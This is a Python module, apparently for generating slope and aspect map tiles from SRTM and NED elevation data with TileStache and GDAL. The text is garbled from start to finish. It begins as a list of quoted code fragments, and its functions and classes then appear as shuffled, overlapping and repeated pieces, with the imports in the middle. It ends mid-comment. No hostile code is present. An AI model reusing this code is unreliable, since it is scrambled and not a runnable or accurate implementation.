# driver =", "top = SRTM1, NED10m # SRTM1 looks terrible bottom, top = SRTM3, NED10m", "difference return [(bottom, proportion), (top, 1 - proportion)] def make_empty_datasource(width, height, xform, wkt,", "\"\"\" if format != 'TIFF': raise Exception('File format other than TIFF for slope", "destination datasets. # driver = gdal.GetDriverByName('GTiff') composite_ds = make_empty_datasource(width+2, height+2, buffered_xform, area_wkt, self.tmpdir)", "= gdal.GRA_Cubic else: # cubic spline looks better stretching out resample = gdal.GRA_CubicSpline", "cs2cs = osr.CoordinateTransformation(webmerc_sref, module.sref) # get a lat/lon bbox buffered by one pixel", "'.') Layer.__init__(self, config, SphericalMercator(), Metatile(), tile_height=size) self.provider = Provider(self, demdir, tmpdir, source) def", "provider for generating tiles of DEM slope and aspect data. Source parameter can", "-pi at north back to pi aspect = numpy.arctan2(x, y) return slope, aspect", "if self.source == 'srtm-ned': providers = choose_providers_srtm(zoom) elif self.source == 'ned-only': providers =", "(xmax - xmin) / composite_ds.GetGeoTransform()[1] if dem_samples > area_pixels: # cubic looks better", "for preparing tiled data. Intended for use in hillup-seed.py script for preparing a", "= 1 # # Set up some useful projections. # osr.UseExceptions() # <--", "bool(proportion_complete > 0 and proportion < 1) if do_blending: composite_without = composite_ds.ReadAsArray() ds_args", "input elevation array. Slope is returned in radians, from 0 for sheer face", "# <-- otherwise errors will be silent and useless. webmerc_proj = SphericalMercator() webmerc_sref", "slope self.aspect = aspect self.w, self.h = self.slope.shape self.wkt = wkt self.xform =", "self.demdir for ds_dem in module.datasources(*ds_args): # estimate the raster density across source DEM", "x = ((window[0] + window[3] + window[3] + window[6]) \\ - (window[2] +", "class SlopeAndAspect: \"\"\" TileStache response object with PIL-like save() and crop() methods. This", "= SRTM3, NED10m elif SRTM1.ideal_zoom < zoom and zoom < NED10m.ideal_zoom: #bottom, top", "or two items. \"\"\" if zoom <= SRTM3.ideal_zoom: return [(SRTM3, 1)] elif SRTM3.ideal_zoom", "[z * elevation[row:(row + height), col:(col + width)] for (row, col) in product(range(3),", "load_func_path(self.source)(zoom) assert sum([proportion for (mod, proportion) in providers]) == 1.0 # # Prepare", "region from the current image. Box is a 4-tuple with left, upper, right,", "\"\"\" Save a two-band GeoTIFF to output file-like object. \"\"\" if format !=", "for preparing a tile directory. \"\"\" def __init__(self, demdir, tiledir, tmpdir, source, size):", "[(bottom, proportion), (top, 1 - proportion)] def make_empty_datasource(width, height, xform, wkt, tmpdir): '''", "Example funcpath: \"Module.Submodule:Function\". \"\"\" modname, objname = funcpath.split(':', 1) __import__(modname) module = modules[modname]", "how the Provider object interacts with TileStache. \"\"\" def __init__(self, layer, demdir, tmpdir=None,", "- yres) # # Keep a version of the composite without the #", "silent and useless. webmerc_proj = SphericalMercator() webmerc_sref = osr.SpatialReference() webmerc_sref.ImportFromProj4(webmerc_proj.srs) class SeedingLayer (Layer):", "xmin, xres, 0, ymax, 0, yres return SlopeAndAspect(self.tmpdir, slope, aspect, area_wkt, tile_xform) class", "Return a list of data sources and proportions for given zoom level. Each", "looks better squeezing down resample = gdal.GRA_Cubic else: # cubic spline looks better", "if zoom <= NED1km.ideal_zoom: return [(NED1km, 1)] elif NED1km.ideal_zoom < zoom and zoom", "providers = [(Worldwide, 1)] else: providers = load_func_path(self.source)(zoom) assert sum([proportion for (mod, proportion)", "seeding layer for preparing tiled data. Intended for use in hillup-seed.py script for", "- xres, ymin + yres) maxlon, maxlat, z = cs2cs.TransformPoint(xmax + xres, ymax", "close(handle) ds = driver.Create(filename, width, height, 1, gdal.GDT_Float32) ds.SetGeoTransform(xform) ds.SetProjection(wkt) ds.GetRasterBand(1).WriteArray(numpy.ones((width, height), numpy.float32)", "numpy.arctan2(x, y) return slope, aspect def load_func_path(funcpath): \"\"\" Load external function based on", "numpy.float32) * -9999, 0, 0) ds.GetRasterBand(1).SetNoDataValue(-9999) return ds def calculate_slope_aspect(elevation, xres, yres, z=1.0):", "in hillup-seed.py script for preparing a tile directory. \"\"\" def __init__(self, demdir, tiledir,", "sources and proportions for given zoom level. Each data source is a module", "height = elevation.shape[0] - 2, elevation.shape[1] - 2 window = [z * elevation[row:(row", "two-band 8-bit GeoTIFFs. See http://tilestache.org/doc/#custom-providers for information on how the SlopeAndAspect object interacts", "save slope and aspect. # slope, aspect = calculate_slope_aspect(elevation, xres, yres) tile_xform =", "maxlon, maxlat, self.demdir for ds_dem in module.datasources(*ds_args): # estimate the raster density across", "utilities. \"\"\" from math import pi, sin, cos from os import unlink, close", "xres, yres) tile_xform = xmin, xres, 0, ymax, 0, yres return SlopeAndAspect(self.tmpdir, slope,", "tmpdir, slope, aspect, wkt, xform): \"\"\" Instantiate with array of slope and aspect,", "has either one or two items. \"\"\" if zoom <= SRTM3.ideal_zoom: return [(SRTM3,", "resample = gdal.GRA_Cubic else: # cubic spline looks better stretching out resample =", "else: providers = load_func_path(self.source)(zoom) assert sum([proportion for (mod, proportion) in providers]) == 1.0", ">= NED10m.ideal_zoom: return [(NED10m, 1)] difference = float(top.ideal_zoom) - float(bottom.ideal_zoom) proportion = 1.", "across source DEM and output dem_samples = (maxlon - minlon) / ds_dem.GetGeoTransform()[1] area_pixels", "SRTM3, NED10m elif SRTM1.ideal_zoom < zoom and zoom < NED10m.ideal_zoom: #bottom, top =", "at north back to pi aspect = numpy.arctan2(x, y) return slope, aspect def", "NED100m elif zoom == NED100m.ideal_zoom: return [(NED100m, 1)] elif NED100m.ideal_zoom < zoom and", "filename = mkstemp(dir=tmpdir, prefix='dem-tools-hillup-data-render-', suffix='.tif') close(handle) ds = driver.Create(filename, width, height, 1, gdal.GDT_Float32)", "squeezing down resample = gdal.GRA_Cubic else: # cubic spline looks better stretching out", "SRTM3.ideal_zoom: return [(SRTM3, 1)] elif SRTM3.ideal_zoom < zoom and zoom < SRTM1.ideal_zoom: #bottom,", "SRTM1.ideal_zoom < zoom and zoom < NED10m.ideal_zoom: #bottom, top = SRTM1, NED10m #", "cubic spline looks better stretching out resample = gdal.GRA_CubicSpline gdal.ReprojectImage(ds_dem, composite_ds, ds_dem.GetProjection(), composite_ds.GetProjection(),", "instance of SlopeAndAspect for requested area. \"\"\" assert srs == webmerc_proj.srs # <--", "for ds_dem in module.datasources(*ds_args): # estimate the raster density across source DEM and", "file-like object. \"\"\" if format != 'TIFF': raise Exception('File format other than TIFF", "window[1] + window[2])) \\ / (8.0 * yres); # in radians, from 0", "two items. \"\"\" if zoom <= SRTM3.ideal_zoom: return [(SRTM3, 1)] elif SRTM3.ideal_zoom <", "all sides minlon, minlat, z = cs2cs.TransformPoint(xmin - xres, ymin + yres) maxlon,", "\"\"\" if zoom <= NED1km.ideal_zoom: return [(NED1km, 1)] elif NED1km.ideal_zoom < zoom and", "preparing a tile directory. \"\"\" def __init__(self, demdir, tiledir, tmpdir, source, size): \"\"\"", "ds_dem.GetGeoTransform()[1] area_pixels = (xmax - xmin) / composite_ds.GetGeoTransform()[1] if dem_samples > area_pixels: #", "- minlon) / ds_dem.GetGeoTransform()[1] area_pixels = (xmax - xmin) / composite_ds.GetGeoTransform()[1] if dem_samples", "y) return slope, aspect def load_func_path(funcpath): \"\"\" Load external function based on a", "Return list has either one or two items. \"\"\" if zoom <= SRTM3.ideal_zoom:", "aspect. # slope, aspect = calculate_slope_aspect(elevation, xres, yres) tile_xform = xmin, xres, 0,", "can be \"srtm-ned\" (default) or \"ned-only\". See http://tilestache.org/doc/#custom-providers for information on how the", "is returned in radians, counterclockwise from -pi at north around to pi. Logic", "yres, 0, yres # # Reproject and merge DEM datasources into destination datasets.", "NED10m, NED100m, NED1km, SRTM1, SRTM3, VFP, Worldwide from ModestMaps.Core import Coordinate from TileStache.Geography", "and minimal geographic information. \"\"\" self.tmpdir = tmpdir self.slope = slope self.aspect =", "better stretching out resample = gdal.GRA_CubicSpline gdal.ReprojectImage(ds_dem, composite_ds, ds_dem.GetProjection(), composite_ds.GetProjection(), resample) ds_dem =", "numpy from .. import save_slope_aspect # used to prevent clobbering in /vsimem/, see:", "dirs='safe') config = Configuration(cache, '.') Layer.__init__(self, config, SphericalMercator(), Metatile(), tile_height=size) self.provider = Provider(self,", "for slope and aspect: \"%s\"' % format) save_slope_aspect(self.slope, self.aspect, self.wkt, self.xform, output, self.tmpdir)", "and output dem_samples = (maxlon - minlon) / ds_dem.GetGeoTransform()[1] area_pixels = (xmax -", "sheer face to pi/2 for flat ground. Aspect is returned in radians, counterclockwise", "self.tmpdir = tmpdir self.slope = slope self.aspect = aspect self.w, self.h = self.slope.shape", "TIFF for slope and aspect: \"%s\"' % format) save_slope_aspect(self.slope, self.aspect, self.wkt, self.xform, output,", "wkt self.xform = xform def save(self, output, format): \"\"\" Save a two-band GeoTIFF", "def renderArea(self, width, height, srs, xmin, ymin, xmax, ymax, zoom): \"\"\" Return an", "- ymax) / height area_wkt = webmerc_sref.ExportToWkt() buffered_xform = xmin - xres, xres,", "use in hillup-seed.py script for preparing a tile directory. \"\"\" def __init__(self, demdir,", "the # current layer applied for later alpha-blending. # do_blending = bool(proportion_complete >", "for sheer face to pi/2 for flat ground. Aspect is returned in radians,", "to prevent clobbering in /vsimem/, see: # http://osgeo-org.1803224.n2.nabble.com/gdal-dev-Outputting-to-vsimem-td6221295.html vsimem_counter = 1 # #", "def __init__(self, layer, demdir, tmpdir=None, source='srtm-ned'): self.tmpdir = tmpdir self.demdir = demdir self.source", "modname, objname = funcpath.split(':', 1) __import__(modname) module = modules[modname] _func = eval(objname, module.__dict__)", "'srtm-ned': providers = choose_providers_srtm(zoom) elif self.source == 'ned-only': providers = choose_providers_ned(zoom) elif self.source", "xres, yres, z=1.0): \"\"\" Return a pair of arrays 2 pixels smaller than", "window[2])) \\ / (8.0 * yres); # in radians, from 0 to pi/2", "'.' class Provider: \"\"\" TileStache provider for generating tiles of DEM slope and", "= composite_ds.ReadAsArray() * proportion_with composite_with += composite_without * proportion_without composite_ds.GetRasterBand(1).WriteArray(composite_with, 0, 0) proportion_complete", "\"ned-only\". See http://tilestache.org/doc/#custom-providers for information on how the Provider object interacts with TileStache.", "ground. Aspect is returned in radians, counterclockwise from -pi at north around to", "# Prepare information for datasets of the desired extent and projection. # xres", "< zoom and zoom < NED100m.ideal_zoom: #bottom, top = NED1km, NED100m bottom, top", "modules import NED10m, NED100m, NED1km, SRTM1, SRTM3, VFP, Worldwide from ModestMaps.Core import Coordinate", "\"\"\" assert srs == webmerc_proj.srs # <-- good enough for now if self.source", "providers: cs2cs = osr.CoordinateTransformation(webmerc_sref, module.sref) # get a lat/lon bbox buffered by one", "hillup-seed.py script for preparing a tile directory. \"\"\" def __init__(self, demdir, tiledir, tmpdir,", "< 1) if do_blending: composite_without = composite_ds.ReadAsArray() ds_args = minlon, minlat, maxlon, maxlat,", "SRTM3, NED10m elif zoom >= NED10m.ideal_zoom: return [(NED10m, 1)] difference = float(top.ideal_zoom) -", "def __init__(self, demdir, tiledir, tmpdir, source, size): \"\"\" \"\"\" cache = Disk(tiledir, dirs='safe')", "= (ymin - ymax) / height area_wkt = webmerc_sref.ExportToWkt() buffered_xform = xmin -", "and zoom < NED100m.ideal_zoom: #bottom, top = NED1km, NED100m bottom, top = NED1km,", "def getTypeByExtension(self, ext): if ext.lower() != 'tiff': raise Exception() return 'image/tiff', 'TIFF' def", "-pi at north around to pi. Logic here is borrowed from hillshade.cpp: http://www.perrygeo.net/wordpress/?p=7", "def load_func_path(funcpath): \"\"\" Load external function based on a path. Example funcpath: \"Module.Submodule:Function\".", "\"Module.Submodule:Function\". \"\"\" modname, objname = funcpath.split(':', 1) __import__(modname) module = modules[modname] _func =", "def name(self): return '.' class Provider: \"\"\" TileStache provider for generating tiles of", "a two-band GeoTIFF to output file-like object. \"\"\" if format != 'TIFF': raise", "mkstemp from sys import modules import NED10m, NED100m, NED1km, SRTM1, SRTM3, VFP, Worldwide", "script for preparing a tile directory. \"\"\" def __init__(self, demdir, tiledir, tmpdir, source,", "into destination datasets. # driver = gdal.GetDriverByName('GTiff') composite_ds = make_empty_datasource(width+2, height+2, buffered_xform, area_wkt,", "(zoom - float(bottom.ideal_zoom)) / difference return [(bottom, proportion), (top, 1 - proportion)] def", "Image import numpy from .. import save_slope_aspect # used to prevent clobbering in", "aspect def load_func_path(funcpath): \"\"\" Load external function based on a path. Example funcpath:", "float(bottom.ideal_zoom) proportion = 1. - (zoom - float(bottom.ideal_zoom)) / difference return [(bottom, proportion),", "source, size): \"\"\" \"\"\" cache = Disk(tiledir, dirs='safe') config = Configuration(cache, '.') Layer.__init__(self,", "1)] elif NED100m.ideal_zoom < zoom and zoom < NED10m.ideal_zoom: #bottom, top = NED100m,", "merge DEM datasources into destination datasets. # driver = gdal.GetDriverByName('GTiff') composite_ds = make_empty_datasource(width+2,", "config = Configuration(cache, '.') Layer.__init__(self, config, SphericalMercator(), Metatile(), tile_height=size) self.provider = Provider(self, demdir,", "SlopeAndAspect for requested area. \"\"\" assert srs == webmerc_proj.srs # <-- good enough", "prevent clobbering in /vsimem/, see: # http://osgeo-org.1803224.n2.nabble.com/gdal-dev-Outputting-to-vsimem-td6221295.html vsimem_counter = 1 # # Set", "than TIFF for slope and aspect: \"%s\"' % format) save_slope_aspect(self.slope, self.aspect, self.wkt, self.xform,", "one or two items. \"\"\" if zoom <= SRTM3.ideal_zoom: return [(SRTM3, 1)] elif", "ds = driver.Create(filename, width, height, 1, gdal.GDT_Float32) ds.SetGeoTransform(xform) ds.SetProjection(wkt) ds.GetRasterBand(1).WriteArray(numpy.ones((width, height), numpy.float32) *", "\\ / (8.0 * yres); # in radians, from 0 to pi/2 slope", "and crop() methods. This object knows only how to save two-band 8-bit GeoTIFFs.", "import pi, sin, cos from os import unlink, close from itertools import product", "zoom < NED10m.ideal_zoom: #bottom, top = SRTM1, NED10m # SRTM1 looks terrible bottom,", "calculate_slope_aspect(elevation, xres, yres, z=1.0): \"\"\" Return a pair of arrays 2 pixels smaller", "(xmax - xmin) / width yres = (ymin - ymax) / height area_wkt", "(top, 1 - proportion)] def choose_providers_ned(zoom): \"\"\" Return a list of data sources", "do_blending: proportion_with = proportion / (proportion_complete + proportion) proportion_without = 1 - proportion_with", "NED10m or NED1km, and the proportions must all add up to one. Return", "#bottom, top = SRTM3, SRTM1 # SRTM1 looks terrible bottom, top = SRTM3,", "raster density across source DEM and output dem_samples = (maxlon - minlon) /", "< NED100m.ideal_zoom: #bottom, top = NED1km, NED100m bottom, top = NED1km, NED100m elif", "version of the composite without the # current layer applied for later alpha-blending.", "proportion_complete += proportion elevation = composite_ds.ReadAsArray() unlink(composite_ds.GetFileList()[0]) composite_ds = None # # Calculate", "def calculate_slope_aspect(elevation, xres, yres, z=1.0): \"\"\" Return a pair of arrays 2 pixels", "2 pixels smaller than the input elevation array. Slope is returned in radians,", "as NED10m or NED1km, and the proportions must all add up to one.", "\"srtm-ned\" (default) or \"ned-only\". See http://tilestache.org/doc/#custom-providers for information on how the Provider object", "window[7] + window[7] + window[8]) \\ - (window[0] + window[1] + window[1] +", "for DEM retrieval utilities. \"\"\" from math import pi, sin, cos from os", "datasets. # driver = gdal.GetDriverByName('GTiff') composite_ds = make_empty_datasource(width+2, height+2, buffered_xform, area_wkt, self.tmpdir) proportion_complete", "composite_ds = make_empty_datasource(width+2, height+2, buffered_xform, area_wkt, self.tmpdir) proportion_complete = 0. for (module, proportion)", "* elevation[row:(row + height), col:(col + width)] for (row, col) in product(range(3), range(3))]", "2 window = [z * elevation[row:(row + height), col:(col + width)] for (row,", "pair of arrays 2 pixels smaller than the input elevation array. Slope is", "0, ymax, 0, yres return SlopeAndAspect(self.tmpdir, slope, aspect, area_wkt, tile_xform) class SlopeAndAspect: \"\"\"", "= numpy.arctan2(x, y) return slope, aspect def load_func_path(funcpath): \"\"\" Load external function based", "TileStache provider for generating tiles of DEM slope and aspect data. Source parameter", "1)] else: providers = load_func_path(self.source)(zoom) assert sum([proportion for (mod, proportion) in providers]) ==", "#bottom, top = SRTM1, NED10m # SRTM1 looks terrible bottom, top = SRTM3,", "a module such as SRTM1 or SRTM3, and the proportions must all add", "aspect = calculate_slope_aspect(elevation, xres, yres) tile_xform = xmin, xres, 0, ymax, 0, yres", "<= NED1km.ideal_zoom: return [(NED1km, 1)] elif NED1km.ideal_zoom < zoom and zoom < NED100m.ideal_zoom:", "\\ - (window[2] + window[5] + window[5] + window[8])) \\ / (8.0 *", "+ yres) maxlon, maxlat, z = cs2cs.TransformPoint(xmax + xres, ymax - yres) #", "== webmerc_proj.srs # <-- good enough for now if self.source == 'srtm-ned': providers", "bbox buffered by one pixel on all sides minlon, minlat, z = cs2cs.TransformPoint(xmin", "if do_blending: composite_without = composite_ds.ReadAsArray() ds_args = minlon, minlat, maxlon, maxlat, self.demdir for", "SphericalMercator(), Metatile(), tile_height=size) self.provider = Provider(self, demdir, tmpdir, source) def name(self): return '.'", "output, self.tmpdir) def crop(self, box): \"\"\" Returns a rectangular region from the current", "if _func is None: raise Exception('eval(%(objname)s) in %(modname)s came up None' % locals())", "Disk from osgeo import gdal, osr from PIL import Image import numpy from", "lower pixels. Not yet implemented! \"\"\" raise NotImplementedError() def choose_providers_srtm(zoom): \"\"\" Return a", "zoom >= NED10m.ideal_zoom: return [(NED10m, 1)] difference = float(top.ideal_zoom) - float(bottom.ideal_zoom) proportion =", "applied for later alpha-blending. # do_blending = bool(proportion_complete > 0 and proportion <", "with left, upper, right, and lower pixels. Not yet implemented! \"\"\" raise NotImplementedError()", "# Keep a version of the composite without the # current layer applied", "parameter can be \"srtm-ned\" (default) or \"ned-only\". See http://tilestache.org/doc/#custom-providers for information on how", "TileStache.Core import Layer, Metatile from TileStache.Config import Configuration from TileStache.Caches import Disk from", "osr from PIL import Image import numpy from .. import save_slope_aspect # used", "two items. \"\"\" if zoom <= NED1km.ideal_zoom: return [(NED1km, 1)] elif NED1km.ideal_zoom <", "y = ((window[6] + window[7] + window[7] + window[8]) \\ - (window[0] +", "* xres); y = ((window[6] + window[7] + window[7] + window[8]) \\ -", "tmpdir=None, source='srtm-ned'): self.tmpdir = tmpdir self.demdir = demdir self.source = source def getTypeByExtension(self,", "proportion)] def choose_providers_ned(zoom): \"\"\" Return a list of data sources and proportions for", "eval(objname, module.__dict__) if _func is None: raise Exception('eval(%(objname)s) in %(modname)s came up None'", "from TileStache.Caches import Disk from osgeo import gdal, osr from PIL import Image", "and the proportions must all add up to one. Return list has either", "ymax - yres) # # Keep a version of the composite without the", "stretching out resample = gdal.GRA_CubicSpline gdal.ReprojectImage(ds_dem, composite_ds, ds_dem.GetProjection(), composite_ds.GetProjection(), resample) ds_dem = None", "\"\"\" Return a pair of arrays 2 pixels smaller than the input elevation", "2, elevation.shape[1] - 2 window = [z * elevation[row:(row + height), col:(col +", "1 - proportion_with composite_with = composite_ds.ReadAsArray() * proportion_with composite_with += composite_without * proportion_without", "srs, xmin, ymin, xmax, ymax, zoom): \"\"\" Return an instance of SlopeAndAspect for", "= aspect self.w, self.h = self.slope.shape self.wkt = wkt self.xform = xform def", "up some useful projections. # osr.UseExceptions() # <-- otherwise errors will be silent", "other than TIFF for slope and aspect: \"%s\"' % format) save_slope_aspect(self.slope, self.aspect, self.wkt,", "itertools import product from tempfile import mkstemp from sys import modules import NED10m,", "area_wkt = webmerc_sref.ExportToWkt() buffered_xform = xmin - xres, xres, 0, ymax - yres,", "output dem_samples = (maxlon - minlon) / ds_dem.GetGeoTransform()[1] area_pixels = (xmax - xmin)", "height), numpy.float32) * -9999, 0, 0) ds.GetRasterBand(1).SetNoDataValue(-9999) return ds def calculate_slope_aspect(elevation, xres, yres,", "top = NED100m, NED10m elif zoom >= NED10m.ideal_zoom: return [(NED10m, 1)] difference =", "radians, counterclockwise from -pi at north around to pi. Logic here is borrowed", "PIL-like save() and crop() methods. This object knows only how to save two-band", "object with PIL-like save() and crop() methods. This object knows only how to", "0, 0) ds.GetRasterBand(1).SetNoDataValue(-9999) return ds def calculate_slope_aspect(elevation, xres, yres, z=1.0): \"\"\" Return a", "the current image. Box is a 4-tuple with left, upper, right, and lower", "numpy.arctan(numpy.sqrt(x*x + y*y)) # in radians counterclockwise, from -pi at north back to", "driver.Create(filename, width, height, 1, gdal.GDT_Float32) ds.SetGeoTransform(xform) ds.SetProjection(wkt) ds.GetRasterBand(1).WriteArray(numpy.ones((width, height), numpy.float32) * -9999, 0,", "later alpha-blending. # do_blending = bool(proportion_complete > 0 and proportion < 1) if", "-9999, 0, 0) ds.GetRasterBand(1).SetNoDataValue(-9999) return ds def calculate_slope_aspect(elevation, xres, yres, z=1.0): \"\"\" Return", "gdal.ReprojectImage(ds_dem, composite_ds, ds_dem.GetProjection(), composite_ds.GetProjection(), resample) ds_dem = None # # Perform alpha-blending if", "Worldwide from ModestMaps.Core import Coordinate from TileStache.Geography import SphericalMercator from TileStache.Core import Layer,", "of data sources and proportions for given zoom level. Each data source is", "product from tempfile import mkstemp from sys import modules import NED10m, NED100m, NED1km,", "object knows only how to save two-band 8-bit GeoTIFFs. See http://tilestache.org/doc/#custom-providers for information", "either one or two items. \"\"\" if zoom <= NED1km.ideal_zoom: return [(NED1km, 1)]", "density across source DEM and output dem_samples = (maxlon - minlon) / ds_dem.GetGeoTransform()[1]", "< NED10m.ideal_zoom: #bottom, top = NED100m, NED10m bottom, top = NED100m, NED10m elif", "- yres, 0, yres # # Reproject and merge DEM datasources into destination", "do_blending = bool(proportion_complete > 0 and proportion < 1) if do_blending: composite_without =", "self.tmpdir = tmpdir self.demdir = demdir self.source = source def getTypeByExtension(self, ext): if", "directory. \"\"\" def __init__(self, demdir, tiledir, tmpdir, source, size): \"\"\" \"\"\" cache =", "< SRTM1.ideal_zoom: #bottom, top = SRTM3, SRTM1 # SRTM1 looks terrible bottom, top", "else: # cubic spline looks better stretching out resample = gdal.GRA_CubicSpline gdal.ReprojectImage(ds_dem, composite_ds,", "Metatile from TileStache.Config import Configuration from TileStache.Caches import Disk from osgeo import gdal,", "window[8])) \\ / (8.0 * xres); y = ((window[6] + window[7] + window[7]", "Disk(tiledir, dirs='safe') config = Configuration(cache, '.') Layer.__init__(self, config, SphericalMercator(), Metatile(), tile_height=size) self.provider =", "- (window[0] + window[1] + window[1] + window[2])) \\ / (8.0 * yres);", "composite_ds.ReadAsArray() * proportion_with composite_with += composite_without * proportion_without composite_ds.GetRasterBand(1).WriteArray(composite_with, 0, 0) proportion_complete +=", "minlon) / ds_dem.GetGeoTransform()[1] area_pixels = (xmax - xmin) / composite_ds.GetGeoTransform()[1] if dem_samples >", "<gh_stars>10-100 \"\"\" Starting point for DEM retrieval utilities. \"\"\" from math import pi,", "and projection. # xres = (xmax - xmin) / width yres = (ymin", "driver = gdal.GetDriverByName('GTiff') composite_ds = make_empty_datasource(width+2, height+2, buffered_xform, area_wkt, self.tmpdir) proportion_complete = 0.", "xres, ymin + yres) maxlon, maxlat, z = cs2cs.TransformPoint(xmax + xres, ymax -", "Each data source is a module such as SRTM1 or SRTM3, and the", "bottom, top = SRTM3, NED10m elif SRTM1.ideal_zoom < zoom and zoom < NED10m.ideal_zoom:", "or NED1km, and the proportions must all add up to one. Return list", "from -pi at north back to pi aspect = numpy.arctan2(x, y) return slope,", "# Reproject and merge DEM datasources into destination datasets. # driver = gdal.GetDriverByName('GTiff')", "some useful projections. # osr.UseExceptions() # <-- otherwise errors will be silent and", "datasources into destination datasets. # driver = gdal.GetDriverByName('GTiff') composite_ds = make_empty_datasource(width+2, height+2, buffered_xform,", "composite_ds, ds_dem.GetProjection(), composite_ds.GetProjection(), resample) ds_dem = None # # Perform alpha-blending if needed.", "= ((window[6] + window[7] + window[7] + window[8]) \\ - (window[0] + window[1]", "(window[0] + window[1] + window[1] + window[2])) \\ / (8.0 * yres); #", "layer for preparing tiled data. Intended for use in hillup-seed.py script for preparing", "source) def name(self): return '.' class Provider: \"\"\" TileStache provider for generating tiles", "xres = (xmax - xmin) / width yres = (ymin - ymax) /", "composite_ds.GetRasterBand(1).WriteArray(composite_with, 0, 0) proportion_complete += proportion elevation = composite_ds.ReadAsArray() unlink(composite_ds.GetFileList()[0]) composite_ds = None", "list has either one or two items. \"\"\" if zoom <= SRTM3.ideal_zoom: return", "self.aspect, self.wkt, self.xform, output, self.tmpdir) def crop(self, box): \"\"\" Returns a rectangular region", "with array of slope and aspect, and minimal geographic information. \"\"\" self.tmpdir =", "object. \"\"\" if format != 'TIFF': raise Exception('File format other than TIFF for", "pi/2 - numpy.arctan(numpy.sqrt(x*x + y*y)) # in radians counterclockwise, from -pi at north", "Starting point for DEM retrieval utilities. \"\"\" from math import pi, sin, cos", "aspect: \"%s\"' % format) save_slope_aspect(self.slope, self.aspect, self.wkt, self.xform, output, self.tmpdir) def crop(self, box):", "/ difference return [(bottom, proportion), (top, 1 - proportion)] def make_empty_datasource(width, height, xform,", "tmpdir self.slope = slope self.aspect = aspect self.w, self.h = self.slope.shape self.wkt =", "\\ / (8.0 * xres); y = ((window[6] + window[7] + window[7] +", "DEM slope and aspect data. Source parameter can be \"srtm-ned\" (default) or \"ned-only\".", "function based on a path. Example funcpath: \"Module.Submodule:Function\". \"\"\" modname, objname = funcpath.split(':',", "choose_providers_ned(zoom) elif self.source == 'vfp': providers = [(VFP, 1)] elif self.source == 'worldwide':", "how the SlopeAndAspect object interacts with TileStache. \"\"\" def __init__(self, tmpdir, slope, aspect,", "Exception('File format other than TIFF for slope and aspect: \"%s\"' % format) save_slope_aspect(self.slope,", "box): \"\"\" Returns a rectangular region from the current image. Box is a", "= choose_providers_srtm(zoom) elif self.source == 'ned-only': providers = choose_providers_ned(zoom) elif self.source == 'vfp':", "composite_ds = None # # Calculate and save slope and aspect. # slope,", "[(NED100m, 1)] elif NED100m.ideal_zoom < zoom and zoom < NED10m.ideal_zoom: #bottom, top =", "0. for (module, proportion) in providers: cs2cs = osr.CoordinateTransformation(webmerc_sref, module.sref) # get a", "dem_samples = (maxlon - minlon) / ds_dem.GetGeoTransform()[1] area_pixels = (xmax - xmin) /", "= Provider(self, demdir, tmpdir, source) def name(self): return '.' class Provider: \"\"\" TileStache", "mkstemp(dir=tmpdir, prefix='dem-tools-hillup-data-render-', suffix='.tif') close(handle) ds = driver.Create(filename, width, height, 1, gdal.GDT_Float32) ds.SetGeoTransform(xform) ds.SetProjection(wkt)", "- 2 window = [z * elevation[row:(row + height), col:(col + width)] for", "= elevation.shape[0] - 2, elevation.shape[1] - 2 window = [z * elevation[row:(row +", "format): \"\"\" Save a two-band GeoTIFF to output file-like object. \"\"\" if format", "NED100m.ideal_zoom: #bottom, top = NED1km, NED100m bottom, top = NED1km, NED100m elif zoom", "SRTM1 # SRTM1 looks terrible bottom, top = SRTM3, NED10m elif zoom ==", "+ width)] for (row, col) in product(range(3), range(3))] x = ((window[0] + window[3]", "width yres = (ymin - ymax) / height area_wkt = webmerc_sref.ExportToWkt() buffered_xform =", "elif self.source == 'vfp': providers = [(VFP, 1)] elif self.source == 'worldwide': providers", "all add up to one. Return list has either one or two items.", "in providers]) == 1.0 # # Prepare information for datasets of the desired", "Slope is returned in radians, from 0 for sheer face to pi/2 for", "information for datasets of the desired extent and projection. # xres = (xmax", "module such as NED10m or NED1km, and the proportions must all add up", "NED100m, NED10m elif zoom >= NED10m.ideal_zoom: return [(NED10m, 1)] difference = float(top.ideal_zoom) -", "\"\"\" if zoom <= SRTM3.ideal_zoom: return [(SRTM3, 1)] elif SRTM3.ideal_zoom < zoom and", "< zoom and zoom < NED10m.ideal_zoom: #bottom, top = SRTM1, NED10m # SRTM1", "window[1] + window[1] + window[2])) \\ / (8.0 * yres); # in radians,", "and merge DEM datasources into destination datasets. # driver = gdal.GetDriverByName('GTiff') composite_ds =", "yres) maxlon, maxlat, z = cs2cs.TransformPoint(xmax + xres, ymax - yres) # #", "composite_ds.ReadAsArray() ds_args = minlon, minlat, maxlon, maxlat, self.demdir for ds_dem in module.datasources(*ds_args): #", "tiles of DEM slope and aspect data. Source parameter can be \"srtm-ned\" (default)", "- (window[2] + window[5] + window[5] + window[8])) \\ / (8.0 * xres);", "# Set up some useful projections. # osr.UseExceptions() # <-- otherwise errors will", "/ (8.0 * yres); # in radians, from 0 to pi/2 slope =", "elif self.source == 'worldwide': providers = [(Worldwide, 1)] else: providers = load_func_path(self.source)(zoom) assert", "[(NED1km, 1)] elif NED1km.ideal_zoom < zoom and zoom < NED100m.ideal_zoom: #bottom, top =", "srs == webmerc_proj.srs # <-- good enough for now if self.source == 'srtm-ned':", "\"\"\" def __init__(self, layer, demdir, tmpdir=None, source='srtm-ned'): self.tmpdir = tmpdir self.demdir = demdir", "# cubic spline looks better stretching out resample = gdal.GRA_CubicSpline gdal.ReprojectImage(ds_dem, composite_ds, ds_dem.GetProjection(),", "zoom and zoom < NED10m.ideal_zoom: #bottom, top = SRTM1, NED10m # SRTM1 looks", "SRTM1.ideal_zoom: #return [(SRTM1, 1)] # SRTM1 looks terrible bottom, top = SRTM3, NED10m", "+ height), col:(col + width)] for (row, col) in product(range(3), range(3))] x =", "\"\"\" def __init__(self, demdir, tiledir, tmpdir, source, size): \"\"\" \"\"\" cache = Disk(tiledir,", "maxlon, maxlat, z = cs2cs.TransformPoint(xmax + xres, ymax - yres) # # Keep", "= (maxlon - minlon) / ds_dem.GetGeoTransform()[1] area_pixels = (xmax - xmin) / composite_ds.GetGeoTransform()[1]", "and lower pixels. Not yet implemented! \"\"\" raise NotImplementedError() def choose_providers_srtm(zoom): \"\"\" Return", "looks terrible bottom, top = SRTM3, NED10m elif SRTM1.ideal_zoom < zoom and zoom", "+ window[5] + window[8])) \\ / (8.0 * xres); y = ((window[6] +", "pixel on all sides minlon, minlat, z = cs2cs.TransformPoint(xmin - xres, ymin +", "[(SRTM1, 1)] # SRTM1 looks 